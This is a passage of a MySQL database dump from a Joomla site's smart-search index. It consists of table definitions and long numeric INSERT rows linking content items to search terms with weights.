.23669),(4626,1556477,4.29324),(4626,1556478,1.16669),(4626,1556479,3.71007),(4626,1556480,0.51331),(4626,1556481,1.16669),(4626,1556482,1.23669),(4626,1556483,0.37331),(4626,1556484,1.19),(4626,1556485,1.33),(4626,1556486,0.32669),(4626,1556487,1.12),(4626,1556488,1.4),(4626,1556489,0.7),(4626,1556490,1.19),(4626,1556491,1.37669),(4626,1556492,0.28),(4734,1556492,0.28),(4626,1556493,1.05),(4626,1556494,1.12),(4635,1558526,0.28),(4635,1558527,0.93331),(4635,1558528,1.14331),(4635,1558529,2.38),(4635,1558530,3.11661),(4635,1558531,0.23331),(4635,1558532,1.02669),(4635,1558533,1.12),(4658,1562913,0.07),(4940,1562913,0.07),(4762,1562913,0.14),(4732,1562913,0.21),(4658,1562914,1.02669),(4658,1562915,1.23669),(4658,1562916,0.21),(4658,1562917,0.91),(4658,1562918,0.95669),(4721,1564292,0.46662),(4734,1564292,0.93324),(4710,1592423,0.23331),(4710,1592424,1.02669),(4710,1592425,1.12),(4721,1603419,0.42),(4721,1603420,1.02669),(4721,1603421,1.09669),(4721,1603422,0.28),(4809,1603422,0.68),(4721,1603423,0.91),(4721,1603424,1.07331),(4721,1603425,0.93331),(4721,1603426,1.16669),(4721,1603427,0.86331),(4721,1603428,1.00331),(4721,1603429,0.28),(4721,1603430,1.09669),(4721,1603431,1.19),(4721,1603432,0.37331),(4721,1603433,1.00331),(4721,1603434,1.05),(4721,1603435,0.23331),(4734,1603435,0.46662),(4721,1603436,0.91),(4721,1603437,1.12),(4732,1613337,0.91),(4732,1613338,1.14331),(4732,1613339,0.98),(4732,1613340,1.23669),(4732,1613341,0.84),(4732,1613342,0.98),(4732,1613516,0.23331),(4732,1613517,1.14331),(4732,1613518,1.21331),(4732,1613519,0.28),(4761,1613519,0.28),(4732,1613520,1.09669),(4761,1613520,1.09669),(4732,1613521,1.14331),(4732,1613522,0.28),(4732,1613523,1.05),(4732,1613524,1.26),(4732,1613525,0.46669),(4732,1613526,0.98),(4732,1613527,1.23669),(4732,1613528,0.18669),(4732,1613529,0.93331),(4732,1613530,1.21331),(4734,1616681,0.28),(4734,1616682,1.09669),(4734,1616683,1.33),(4734,1616684,0.46669),(4917,1616684,0.46669),(4734,1616685,1.16669),(4734,1616686,1.26),(4734,1616687,0.65331),(4734,1616688,1.07331),(4734,1616689,1.21331),(4734,1616690,0.88669),(4734,1616691,1.09669),(4734,1616692,1.02669),(4734,1616693,1.09669),(4734,1616694,0.95669),(4734,1616695,1.12),(4734,1616696,1.05),(4734,1616697,1.19),(4940,1616698,0.18669),(4734,1616698,1.01346),(4734,1616699,0.91),(4734,1616700,1.14331),(4734,1616701,0.93331),(4734,1616702,1.07331),(4734,1616703,0.98),(4734,1616704,1.02669),(4734,1616705,2.04),(4734,1616706,2.66339),(4734,1616707,1.12),(4734,1616708,0.95669),(4734,1616709,1.00331),(4734,1616710,0.88669),(4734,1616711,1.00331),(4734,1616712,0.98),(4734,1616713,1.09669),(4734,1616714,0.95669),(4734,1616715,1.14331),(4734,1616716,0.28),(4734,1616717,0.95669),(4734,1616718,1.14331),(4734,1616719,1.12),(4734,1616720,1.28331),(4734,1616721,0.88669),(4734,1616722,0.98),(4734,1616723,0.86331),(4734,1616724,0.95669),(4736,1618053,1.02),(4736,1618054,2.49339),(4736,1618055,2.77661),(4761,1620564,0.32669),(4762,1620564,0.32669),(4761,1626245,0.56),(4761,1626246,1.82),(4761,1626247,0.95669),(4761,1626248,0.95669),(4761,1626249,0.14),(4761,1626250,0.88669),(4761,1626251,1.00331),(4761,1626252,0.14),(4761,1626253,0.88669),(4761,1626254,0.93331),(4761,1626255,0.35),(4761,1626256,0.86331),(4761,1626257,0.91),(4761,1626763,0.18669),(4761,1626764,1.00331),(4761,1626765,1.09669),(4761,1626766,0.23331),(4761,1626767,0.95669),(4761,1626768,1.28331),(4761,1626769,0.32669),(4761,1626770,0.95669),(4761,1626771,1.16669),(4761,1626772,0.46669),(4761,1626773,1.05),(4761,1626774,1.37669),(4761,1626775,0.23331),(4761,1626776,1.05),(4761,1626777,1.28331),(4761,1626778,0.37331),(4761,1626779,1.07331),(4761,1626780,1.35331),(4761,1626781,1.35331),(4761,1626782,0.46669),(4761,1626783,1.19),(4761,1626784,1.37669),(4761,1626785,0.18669),(4761,1626786,1.02669),(4761,1626787,1.28331),(4761,1626788,0.42),(4761,1626789,1.09669),(4761,1626790,1.4),(4761,1626791,0.46669),(4761,1626792,1.14331),(4761,1626793,1.26),(4761,1626794,0.37331),(4761,1626795,1.28331),(4761,1626796,1.4),(4761,1626797,1.14331),(4761,1626798,1.4),(4761,1626799,0.23331),(4761,1626800,0.91),(4761,1626801,0.95669),(4762,1628044,0.98),(4762,1628045,1.14331),(4762,1628046,0.93331),(4762,1628047,1.16669),(4762,1628312,0.23331),(4762,1628313,0.95669),(4762,1628314,1.21331),(4762,1628315,0.37331),(4762,1628316,1.02669),(4762,1628317,1.28331),(4762,1628318,0.18669),(4762,1628319,0.93331),(4762,1628320,1.19),(4762,1628321,0.18662),(4762,1628322,1.68),(4762,1628323,1.05),(4762,1628324,1.02669),(4762,1628325,1.12),(4762,1628326,1.35331),(4777,1629565,0.32669),(4777,1629566,1.09669),(4777,1629567,1.23669),(4798,1643445,1.07331),(4798,1643446,1.12),(4798,1643447,0.37331),(4798,1643448,1.14331),(4798,1643449,1.4),(4798,1643450,1.65323),(4798,1643451,1.09669),(4798,1643452,1.4),(4798,1643453,3.06),(4798,1643454,3.4),(4798,1643455,1.26),(4798,1643456,1.35331),(4803,1645026,0.46662),(4803,1645027,1.72662),(4803,1645028,0.95669),(4803,1645029,1.02669),(4803,1645030,0.18669),(4849,1645030,0.37338),(4803,1645031,0.95669),(4803,1645032,1.07331),(4849,1647146,0.18669),(4849,1647147,1.02669),(4849,1647148,1.26),(4849,1647149,0.23331),(4849,1647150,1.05),(4849,1647151,1.26),(4849,1647152,1.00331),(4849,1647153,1.07331),(4849,1647154,0.86331),(4849,1647155,1.07331),(4851,1647990,0.32669),(4852,1647990,0.32669),(4857,1647990,0.32669),(4851,1647991,0.91),(4852,1647991,0.91),(4857,1647991,0.91),(4851,1647992,1.05),(4852,1647992,1.05),(4857,1647992,1.05),(4909,1672299,0.23331),(4909,1672300,0.86331),(4909,1672301,1.07331),(4909,1672302,0.23331),(4917,1672302,0.23331),(4918,1672302,0.56661),(4909,1672303,1.00331),(4909,1672304,1.14331),(4917,1679119,1.07331),(4917,1679120,1.26),(4917,1679121,0.91),(4917,1679122,1.16669),(4918,1679878,2.26661),(4918,1679879,2.55),(4938,1686328,0.46669),(4940,1686328,2.06677),(4938,1686329,1.09669),(4938,1686330,1.16669),(4940,1688151,0.86331),(4940,1688152,1.16669),(4940,1688402,2.05324),(4940,1688403,1.02669),(4940,1688404,1.21331),(4940,1688405,1.19),(4940,1688406,1.26),(4940,1688407,1.19),(4940,1688408,1.4),(4940,1688409,1.02669),(4940,1688410,1.21331),(4940,1688411,1.14331),(4940,1688412,1.21331),(4940,1688413,2.38),(4940,1688414,2.83339),(4940,1688415,1.07331),(4940,1688416,1.26),(4940,1688417,0.95669),(4940,1688418,1.21331);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms1` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms2`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms2`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms2` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms2`
--

LOCK TABLES `fw3gt_finder_links_terms2` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms2` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms2` VALUES (4723,1523624,0.28),(4764,1523624,0.28),(4780,1523624,0.28),(4837,1523624,0.28),(4850,1523624,0.28),(4927,1523624,0.28),(4928,1523624,0.28),(4951,1523624,0.28),(4653,1523624,0.68),(4723,1523625,1.14331),(4837,1523625,1.14331),(4850,1523625,1.14331),(4723,1523626,1.35331),(4837,1523626,1.35331),(4850,1523626,1.35331),(4723,1523627,0.56),(4837,1523627,0.56),(4850,1523627,0.56),(4723,1523628,1.19),(4837,1523628,1.19),(4850,1523628,1.19),(4723,1523629,1.4),(4850,1523629,1.4),(4723,1523630,0.90661),(4764,1523630,0.90661),(4850,1523630,0.90661),(4928,1523630,0.90661),(4951,1523630,0.90661),(4723,1523631,2.60661),(4764,1523631,2.60661),(4850,1523631,2.60661),(4928,1523631,2.60661),(4951,1523631,2.60661),(4723,1523632,3.11661),(4764,1523632,3.11661),(4850,1523632,3.11661),(4928,1523632,3.11661),(4951,1523632,3.11661),(4723,1523657,0.37331),(4764,1523657,0.37331),(4837,1523657,0.37331),(4850,1523657,0.37331),(4928,1523657,0.37331),(4951,1523657,0.37331),(4723,1523658,1.19),(4764,1523658,1.19),(4850,1523658,1.19),(4928,1523658,1.19),(4951,1523658,1.19),(4723,1523659,1.28331),(4764,1523659,1.28331),(4850,1523659,1.28331),(4928,1523659,1.28331),(4951,1523659,1.28331),(4541,1523846,1.24661),(4543,1523846,1.24661),(4569,1524762,0.18669),(4569,1524763,0.88669),(4569,1524764,1.07331),(4569,1524801,0.46669),(4571,1524801,0.46669),(4572,1524801,0.46669),(4661,1524801,0.46669),(4669,1524801,0.46669),(4741,1524801,0.46669),(4749,1524801,0.46669),(4753,1524801,0.46669),(4839,1524801,0.46669),(4847,1524801,0.46669),(4851,1524801,0.46669),(4852,1524801,0.46669),(4857,1524801,0.46669),(4569,1524802,1.07331),(4571,1524802,1.07331),(4572,1524802,1.07331),(4661,1524802,1.07331),(4569,1524803,1.14331),(4571,1524803,1.14331),(4572,1524803,1.14331),(4661,1524803,1.14331),(4572,1524955,0.23331),(4661,1524955,0.23331),(4669,1524955,0.23331),(4693,1524955,0.23331),(4736,1524955,0.23331),(4741,1524955,0.23331),(4780,1524955,0.23331),(4927,1524955,0.23331),(4803,1524955,0.46662),(4849,1524955,0.46662),(4571,1524955,0.69993),(4940,1524955,0.69993),(4572,1524956,0.91),(4661,1524956,0.91),(4693,1524956,0.91),(4571,1524956,2.73),(4572,1524957,1.09669),(4661,1524957,1.09669),(4571,1524957,3.29007),(4571,1524979,0.14),(4777,1524979,0.14),(4571,1524980,0.95669),(4571,1524981,1.02669),(4734,1525115,0.18669),(4574,1525115,0.45339),(4938,1525115,0.45339),(4798,1525115,0.93345),(4710,1525115,1.20015),(4616,1525123,0.04669),(4798,1525123,0.04669),(4803,1525123,0.04669),(4625,1525123,0.09338),(4761,1525123,0.09338),(4940,1525123,0.09338),(4574,1525123,0.11339),(4678,1525123,0.11339),(4732,1525123,0.11339),(4735,1525123,0.11339),(4604,1525123,0.14007),(4608,1525123,0.14007),(4617,1525123,0.14007),(4777,1525123,0.14007),(4710,1525123,0.18676),(4909,1525123,0.18676),(4927,1525123,0.18676),(4849,1525123,0.23345),(4614,1525123,0.37352),(4626,1525123,0.37352),(4917,1525123,0.37352),(4721,1525123,0.60697),(4734,1525123,1.0005),(4574,1525124,2.26661),(4574,1525125,2.43661),(4585,1526794,0.98679),(4669,1527333,0.18669),(4741,1527333,0.18669),(4591,1527333,0.45339),(4591,1527334,2.09661),(4591,1527335,2.43661),(4593,1527356,0.8),(4593,1527357,3.2),(4593,1527358,3.7334),(4593,1527382,0.68),(4593,1527383,2.32339),(4593,1527384,2.72),(4593,1527385,1.02),(4593,1527386,2.43661),(4593,1527387,2.83339),(4593,1527388,1.13339),(4593,1527389,2.43661),(4593,1527390,2.77661),(4594,1527533,0.28),(4594,1527534,1.14331),(4594,1527535,1.28331),(4594,1527536,0.18669),(4594,1527537,0.91),(4594,1527538,0.95669),(4635,1527539,0.14),(4777,1527539,0.14),(4909,1527539,0.14),(4938,1527539,0.14),(4594,1527539,0.28),(4849,1527539,0.28),(4617,1527539,0.42),(4798,1527539,0.42),(4917,1527539,0.42),(4927,1527539,0.42),(4604,1527539,0.56),(4625,1527539,0.62),(4626,1527539,0.7),(4608,1527539,0.76),(4624,1527539,0.9),(4614,1527539,0.98),(4616,1527539,1.32),(4734,1527539,1.4),(4594,1527540,1.02669),(4594,1527541,1.26),(4594,1527542,1.07331),(4594,1527543,1.30669),(4594,1527544,0.09331),(4616,1527544,0.09331),(4624,1527544,0.09331),(4803,1527544,0.09331),(4909,1527544,0.09331),(4617,1527544,0.18662),(4710,1527544,0.18662),(4777,1527544,0.18662),(4849,1527544,0.18662),(4927,1527544,0.18662),(4664,1527544,0.22661),(4604,1527544,0.27993),(4608,1527544,0.27993),(4614,1527544,0.27993),(4734,1527544,0.27993),(4798,1527544,0.27993),(4938,1527544,0.27993),(4732,1527544,0.31992),(4917,1527544,0.41323),(4721,1527544,0.46655),(4940,1527544,0.46655),(4625,1527544,0.65317),(4626,1527544,1.39965),(4594,1527545,1.00331),(4594,1527546,1.05),(4594,1527547,0.79339),(4594,1527548,2.26661),(4594,1527549,2.60661),(4594,1527550,0.37331),(4594,1527551,0.93331),(4594,1527552,1.23669),(4595,1527725,1.6),(4604,1528992,0.42),(4608,1528992,0.42),(4614,1528992,0.42),(4616,1528992,0.42),(4617,1528992,0.42),(4625,1528992,0.42),(4604,1528993,0.98),(4608,1528993,0.98),(4614,1528993,0.98),(4616,1528993,0.98),(4617,1528993,0.98),(4625,1528993,0.98),(4604,1528998,1.07331),(4608,1528998,1.07331),(4617,1528998,1.07331),(4626,1528998,1.07331),(4604,1528999,1.12),(4608,1528999,1.12),(4617,1528999,1.12),(4626,1528999,1.12),(4604,1529009,0.42),(4608,1529009,0.42),(4614,1529009,0.42),(4616,1529009,0.42),(4617,1529009,0.42),(4625,1529009,0.42),(4626,1529009,0.42),(4604,1529439,1.02669),(4608,1529439,1.02669),(4617,1529439,1.02669),(4626,1529439,1.02669),(4604,1529440,1.23669),(4608,1529440,1.23669),(4617,1529440,1.23669),(4626,1529440,1.23669),(4604,1529443,0.32669),(4608,1529443,0.32669),(4614,1529443,0.32669),(4616,1529443,0.32669),(4617,1529443,0.32669),(4625,1529443,0.32669),(4755,1529443,0.56004),(4909,1529443,2.10015),(4604,1529444,0.91),(4608,1529444,0.91),(4614,1529444,0.91),(4617,1529444,0.91),(4625,1529444,0.91),(4604,1529445,1.05),(4608,1529445,1.05),(4614,1529445,1.05),(4617,1529445,1.05),(4625,1529445,1.05),(4604,1529452,0.23331),(4608,1529452,0.23331),(4614,1529452,0.23331),(4616,1529452,0.23331),(4617,1529452,0.23331),(4625,1529452,0.23331),(4604,1529453,1.09669),(4608,1529453,1.09669),(4614,1529453,1.09669),(4617,1529453,1.09669),(4625,1529453,1.09669),(4604,1529454,1.23669),(4608,1529454,1.23669),(4614,1529454,1.23669),(4617,1529454,1.23669),(4625,1529454,1.23669),(4604,1529461,0.23331),(4614,1529461,0.23331),(4616,1529461,0.23331),(4617,1529461,0.23331),(4624,1529461,0.23331),(4625,1529461,0.23331),(4626,1529461,0.23331),(4608,1529461,0.46662),(4604,1529462,1.00331),(4614,1529462,1.00331),(4616,1529462,1.00331),(4617,1529462,1.00331),(4625,1529462,1.00331),(4626,1529462,1.00331),(4608,1529462,2.00662),(4604,1535965,0.46669),(4604,1535966,1.21331),(4604,1535967,1.4),(4604,1535976,0.32669),(4604,1535977,1.16669),(4604,1535978,1.23669),(4604,1536050,0.14),(4616,1536050,0.14),(4604,1536051,0.95669),(4604,1536052,1.19),(4604,1536135,0.14),(4626,1536135,0.14),(4849,1536135,0.14),(4604,1536136,1.16669),(4604,1536137,1.28331),(4625,1536138,0.14),(4604,1536138,0.42),(4604,1536139,1.02669),(4604,1536140,1.16669),(4604,1536141,1.02669),(4604,1536142,1.35331),(4604,1536143,1.05),(4604,1536144,1.19),(4604,1536145,0.14),(4625,1536145,0.14),(4626,1536145,0.56),(4604,1536146,0.23331),(4614,1536146,0.23331),(4617,1536146,0.23331),(4626,1536146,0.23331),(4777,1536146,0.23331),(4625,1536146,0.46662),(4804,1536146,0.56661),(4604,1536147,0.95669),(4617,1536147,0.95669),(4625,1536147,0.95669),(4626,1536147,0.95669),(4604,1536148,1.02669),(4617,1536148,1.02669),(4625,1536148,1.02669),(4604,1536149,0.23331),(4604,1536150,1.02669),(4604,1536151,1.33),(4604,1536152,0.56),(4616,1536152,0.56),(4625,1536152,1.12),(4604,1536153,1.14331),(4616,1536153,1.14331),(4625,1536153,2.28662),(4604,1536154,1.4),(4604,1536155,0.56),(4604,1536156,1.07331),(4604,1536157,1.28331),(4604,1536158,1.07331),(4604,1536159,1.14331),(4604,1536160,1.07331),(4604,1536161,1.12),(4604,1536162,0.91),(4614,1536162,0.91),(4617,1536162,0.91),(4625,1536162,0.91),(4626,1536162,0.91),(4604,1536163,1.05),(4617,1536163,1.05),(4625,1536163,1.05),(4626,1536163,1.05),(4604,1536164,1.07331),(4614,1536164,1.07331),(4616,1536164,1.07331),(4604,1536165,1.14331),(4614,1536165,1.14331),(4604,1536166,0.81669),(4616,1536166,0.81669),(4617,1536166,0.81669),(4624,1536166,0.81669),(4625,1536166,0.81669),(4626,1536166,0.81669),(4604,1536167,0.86331),(4616,1536167,0.86331),(4617,1536167,0.86331),(4624,1536167,0.86331),(4625,1536167,0.86331),(4626,1536167,0.86331),(4604,1536168,0.84),(4604,1536169,1.09669),(4604,1536170,1.14331),(4604,1536171,1.4),(4604,1536172,0.18669),(4604,1536173,0.88669),(4604,1536174,0.93331),(4604,1536175,1.12),(4617,1536175,1.12),(4625,1536175,1.12),(4604,1536176,1.30669),(4604,1536177,0.42),(4604,1536178,1.12),(4604,1536179,1.30669),(4604,1536425,0.91),(4617,1536425,1.82),(4604,1536426,0.98),(4604,1536427,0.84),(4604,1536428,0.93331),(4604,1536429,0.32669),(4604,1536430,0.91),(4604,1536431,1.05),(4604,1536432,0.65331),(4614,1536432,0.65331),(4604,1536433,1.30669),(4614,1536433,1.30669),(4604,1536434,1.4),(4604,1536435,0.46669),(4616,1536435,0.46669),(4604,1536436,1.09669),(4616,1536436,1.09669),(4604,1536437,1.16669),(4616,1536437,1.16669),(4604,1536438,1.26),(4616,1536438,1.26),(4604,1536439,0.32669),(4604,1536440,0.93331),(4604,1536441,1.00331),(4608,1540219,0.09331),(4614,1540219,0.09331),(4608,1540220,0.81669),(4608,1540221,0.91),(4608,1540222,0.98),(4608,1540223,1.16669),(4608,1540224,2.32339),(4624,1540224,2.32339),(4625,1540224,2.32339),(4608,1540225,2.94661),(4608,1540226,1.19),(4608,1540227,1.37669),(4608,1540228,0.14),(4798,1540228,0.14),(4614,1540228,0.28),(4721,1540228,0.28),(4608,1540229,1.07331),(4614,1540229,1.07331),(4608,1540230,1.16669),(4608,1540231,0.81669),(4625,1540231,0.81669),(4608,1540232,0.86331),(4608,1540233,1.82),(4608,1540234,2.19338),(4608,1540235,0.95669),(4608,1540236,1.14331),(4608,1540237,0.32669),(4608,1540238,1.05),(4608,1540239,1.26),(4608,1540616,2.05338),(4608,1540617,2.66),(4608,1540618,0.46669),(4608,1540619,1.05),(4608,1540620,1.09669),(4608,1540621,1.12),(4608,1540622,2.56662),(4608,1540623,2.8),(4608,1540624,0.37331),(4616,1540624,0.37331),(4608,1540625,1.12),(4608,1540626,1.26),(4608,1540627,0.32669),(4614,1540627,0.32669),(4608,1540628,1.05),(4614,1540628,1.05),(4608,1540629,1.12),(4608,1540630,1.16669),(4617,1540630,1.16669),(4608,1540631,1.19),(4608,1540632,0.93338),(4608,1540633,2.33338),(4608,1540634,2.70662),(4608,1540635,0.28),(4608,1540636,0.95669),(4608,1540637,1.23669),(4614,1546450,1.12),(4614,1546451,1.21331),(4614,1546452,0.95669),(4614,1546453,1.05),(4614,1546454,0.09331),(4734,1546454,0.09331),(4909,1546454,0.22661),(4614,1546455,0.79331),(4614,1546456,0.95669),(4614,1546457,0.60669),(4614,1546458,1.12),(4614,1546459,1.28331),(4614,1546460,0.84),(4614,1546461,0.98),(4614,1546462,1.05),(4614,1546463,0.91),(4614,1546464,0.95669),(4614,1546465,0.95669),(4614,1546466,1.09669),(4614,1546467,1.02669),(4614,1546468,1.21331),(4614,1546469,0.88669),(4614,1546470,1.14331),(4614,1546471,0.37338),(4917,1546471,0.37338),(4813,1546471,0.45339),(4616,1546471,0.93345),(4614,1546472,0.84),(4614,1546473,1.12),(4614,1546474,1.14331),(4614,1546475,1.21331),(4614,1546476,1.4),(4614,1546477,0.91),(4614,1546478,0.95669),(4614,1546479,0.86331),(4614,1546480,1.02669),(4614,1546481,1.07331),(4614,1546482,1.28331),(4614,1546483,1.19),(4614,1546484,1.37669),(4625,1546485,0.18669),(4614,1546485,0.56007),(4614,1546486,1.00331),(4614,1546487,1.07331),(4614,1546488,0.95669),(4614,1546489,1.14331),(4614,1546490,0.86331),(4614,1546491,1.09669),(4614,1546492,0.37331),(4614,1546493,0.93331),(4614,1546494,1.12),(4626,1546495,0.23331),(4614,1546495,0.46662),(4798,1546495,0.46662),(4614,1546496,1.02669),(4614,1546497,1.16669),(4614,1546498,1.07331),(4614,1546499,1.12),(4614,1546500,1.16669),(4626,1546500,1.16669),(4614,1546501,1.21331),(4614,1546502,0.37331),(4777,1546502,0.37331),(4614,1546503,1.02669),(4614,1546504,1.19),(4614,1546505,0.42),(4734,1546505,0.42),(4803,1546505,0.42),(4614,1546506,1.00331),(4614,1546507,1.07331),(4616,1547061,0.84),(4614,1547061,1.68),(4614,1547062,0.98),(4616,1547062,0.98),(4614,1547063,0.91),(4614,1547064,0.91),(4614,1547065,1.02669),(4614,1547066,0.86331),(4626,1547066,0.86331),(4614,1547067,1.07331),(4614,1547068,0.88669),(4614,1547069,1.00331),(4614,1547070,1.07331),(4614,1547071,1.12),(4614,1547072,1.77338),(4614,1547073,1.86662),(4614,1547074,0.28),(4917,1547074,0.28),(4735,1547074,0.68),(4614,1547075,0.88669),(4614,1547076,1.16669),(4614,1547077,0.37331),(4614,1547078,1.21331),(4614,1547079,1.4),(4614,1547080,0.65331),(4614,1547081,1.23669),(4614,1547082,1.4),(4614,1547083,1.4),(4614,1547084,1.14331),(4614,1547085,1.26),(4626,1547085,1.26),(4616,1547761,0.91),(4616,1547762,1.09669),(4616,1547817,1.02669),(4616,1547818,1.23669),(4625,1547818,1.23669),(4616,1547819,0.32669),(4616,1547820,1.09669),(4616,1547821,1.33),(4616,1547822,0.42),(4616,1547823,1.07331),(4616,1547824,1.28331),(4616,1547825,0.65338),(4616,1547826,1.09669),(4616,1547827,1.14331),(4616,1547828,0.91),(4616,1547829,1.14331),(4616,1547830,0.98),(4616,1547831,1.02669),(4616,1547832,1.02669),(4616,1547833,1.19),(4617,1547834,1.00331),(4616,1547834,2.00662),(4616,1547835,1.09669),(4616,1547836,1.05),(4617,1547836,1.05),(4616,1547837,1.00331),(4616,1547838,1.26),(4616,1547839,1.30669),(4616,1547840,0.93331),(4616,1547841,1.21331),(4626,1547842,1.02669),(4616,1547842,2.49339),(4626,1547843,1.33),(4616,1547843,3.23),(4616,1547844,1.77338),(4616,1547845,1.14331),(4616,1547846,1.19),(4616,1547847,0.86331),(4616,1547848,1.05),(4616,1547849,0.93331),(4616,1547850,1.23669),(4616,1547851,0.88669),(4616,1547852,1.07331),(4616,1547853,1.00331),(4616,1547854,1.23669),(4616,1547855,0.51331),(4616,1547856,1.02669),(4616,1547857,1.33),(4616,1547858,0.46669),(4616,1547859,1.09669),(4616,1547860,1.30669),(4616,1548025,1.00331),(4616,1548026,0.42),(4616,1548027,1.09669),(4616,1548028,1.33),(4616,1548029,0.37331),(4616,1548030,1.02669),(4616,1548031,1.12),(4616,1548032,1.02669),(4616,1548033,1.12),(4616,1548034,0.98),(4616,1548035,1.21331),(4616,1548036,0.23331),(4616,1548037,0.86331),(4616,1548038,1.07331),(4616,1548039,0.46662),(4616,1548040,1.82),(4616,1548041,1.91338),(4617,1548235,0.09331),(4721,1548235,0.09331),(4734,1548235,0.09331),(4917,1548235,0.09331),(4625,1548235,0.18662),(4617,1548236,1.05),(4617,1548237,1.19),(4617,1548287,0.14),(4617,1548288,1.00331),(4617,1548289,1.07331),(4617,1548290,0.37331),(4617,1548291,1.26),(4617,1548292,1.35331),(4617,1548293,0.14),(4617,1548294,1.09669),(4617,1548295,1.14331),(4617,1548296,0.14),(4625,1548296,0.28),(4927,1548296,0.28),(4617,1548297,0.91),(4617,1548298,1.14331),(4617,1548299,0.7),(4617,1548300,1.21331),(4617,1548301,1.4),(4617,1548302,0.84),(4617,1548303,0.88669),(4617,1548304,0.18669),(4617,1548305,0.88669),(4617,1548306,1.09669),(4617,1548307,1.4),(4617,1548455,1.14331),(4617,1548456,1.09669),(4617,1548457,0.65331),(4625,1548457,0.65331),(4626,1548457,0.65331),(4617,1548458,1.30669),(4625,1548458,1.30669),(4626,1548458,1.30669),(4617,1548459,1.4),(4617,1548460,1.68),(4617,1548461,1.19),(4617,1548462,1.37669),(4617,1548463,1.19),(4617,1548464,1.4),(4617,1548465,1.33),(4617,1548466,1.4),(4617,1548467,0.28),(4624,1548467,0.28),(4617,1548468,0.91),(4624,1548468,0.91),(4617,1548469,0.98),(4624,1548469,0.98),(4617,1548470,0.7),(4617,1548471,1.33),(4617,1548472,1.4),(4624,1553936,0.51331),(4624,1553937,1.21331),(4624,1553938,1.4),(4624,1554131,0.37331),(4626,1554131,0.37331),(4798,1554131,0.37331),(4624,1554132,1.21331),(4624,1554133,1.4),(4624,1554134,0.51331),(4624,1554135,1.16669),(4624,1554136,1.4),(4624,1554137,0.23331),(4624,1554138,0.95669),(4624,1554139,1.05),(4624,1554140,0.95669),(4624,1554141,1.33),(4624,1554142,0.91),(4624,1554143,1.05),(4624,1554144,0.91),(4624,1554145,0.98),(4624,1554146,1.02669),(4624,1554147,1.07331),(4624,1554148,0.14),(4624,1554149,1.00331),(4624,1554150,1.16669),(4624,1554151,0.18669),(4798,1554151,0.18669),(4624,1554152,0.86331),(4624,1554153,0.93331),(4624,1554154,0.42),(4624,1554155,1.16669),(4624,1554156,1.21331),(4624,1554157,0.18669),(4624,1554158,0.91),(4624,1554159,0.98),(4624,1554459,0.7),(4798,1554459,0.7),(4624,1554460,1.30669),(4798,1554460,1.30669),(4624,1554461,1.4),(4624,1554462,1.00331),(4624,1554463,1.16669),(4625,1554901,0.09331),(4734,1554901,0.09331),(4777,1554901,0.09331),(4927,1554901,0.18662),(4721,1554901,0.27993),(4625,1554902,0.81669),(4625,1554903,1.05),(4625,1554920,0.95669),(4625,1554921,1.00331),(4625,1554922,0.98),(4625,1554923,1.12),(4625,1555014,0.98),(4625,1555015,1.19),(4625,1555016,1.07331),(4625,1555017,1.30669),(4625,1555018,0.91),(4625,1555019,1.19),(4625,1555020,0.23331),(4625,1555021,1.02669),(4625,1555022,1.26),(4625,1555023,0.23331),(4626,1555023,0.23331),(4625,1555024,1.02669),(4626,1555024,1.02669),(4625,1555025,1.28331),(4625,1555026,1.05),(4625,1555027,1.23669),(4625,1555028,1.00331),(4625,1555029,1.16669),(4625,1555030,1.28331),(4625,1555031,2.72),(4625,1555032,1.07331),(4625,1555033,1.23669),(4625,1555034,0.91),(4625,1555035,0.81669),(4625,1555036,1.02669),(4625,1555037,0.91),(4625,1555038,1.21331),(4625,1555039,0.98),(4625,1555040,1.12),(4625,1555041,0.93331),(4625,1555042,1.16669),(4625,1555043,0.95669),(4625,1555044,1.09669),(4625,1555045,0.88669),(4625,1555046,1.12),(4625,1555047,1.4),(4625,1555048,0.42),(4625,1555049,0.98),(4625,1555050,1.05),(4625,1555051,0.32669),(4625,1555052,1.07331),(4625,1555053,1.16669),(4625,1555419,0.91),(4625,1555420,1.12),(4625,1555421,0.84),(4734,1555421,1.68),(4625,1555422,1.14331),(4625,1555423,0.37331),(4625,1555424,1.23669),(4625,1555425,1.4),(4625,1555426,0.46669),(4625,1555427,1.07331),(4625,1555428,1.26),(4625,1555429,1.4),(4625,1555430,0.65331),(4625,1555431,1.12),(4625,1555432,1.4),(4625,1555433,0.32669),(4625,1555434,0.93331),(4625,1555435,1.00331),(4625,1555436,1.23669),(4626,1556003,0.56),(4626,1556004,1.05),(4626,1556005,1.30669),(4626,1556006,2.46679),(4626,1556007,3.3334),(4626,1556008,2.77661),(4626,1556009,0.60669),(4626,1556010,1.09669),(4626,1556011,1.4),(4626,1556242,0.42),(4626,1556243,0.91),(4626,1556244,1.09669),(4626,1556245,0.98),(4626,1556246,1.12),(4626,1556247,0.93331),(4626,1556248,1.07331),(4626,1556249,0.32669),(4626,1556250,1.07331),(4626,1556251,1.14331),(4626,1556252,0.28),(4626,1556253,0.98),(4626,1556254,1.05),(4626,1556255,1.00331),(4626,1556256,1.16669),(4626,1556257,0.84),(4626,1556258,1.16669),(4626,1556259,0.18669),(4626,1556260,0.88669),(4626,1556261,1.07331),(4626,1556262,1.02669),(4626,1556263,1.09669),(4626,1556264,0.84),(4626,1556265,0.98),(4626,1556266,1.12),(4626,1556267,1.35331),(4626,1556268,0.93331),(4626,1556269,1.07331),(4626,1556270,1.05),(4626,1556271,0.84),(4626,1556272,3.15),(4626,1556273,3.36),(4626,1556274,1.28331),(4626,1556275,1.07331),(4626,1556276,1.4),(4626,1556277,0.23331),(4777,1556277,0.23331),(4927,1556277,0.23331),(4626,1556278,1.14331),(4626,1556279,1.4),(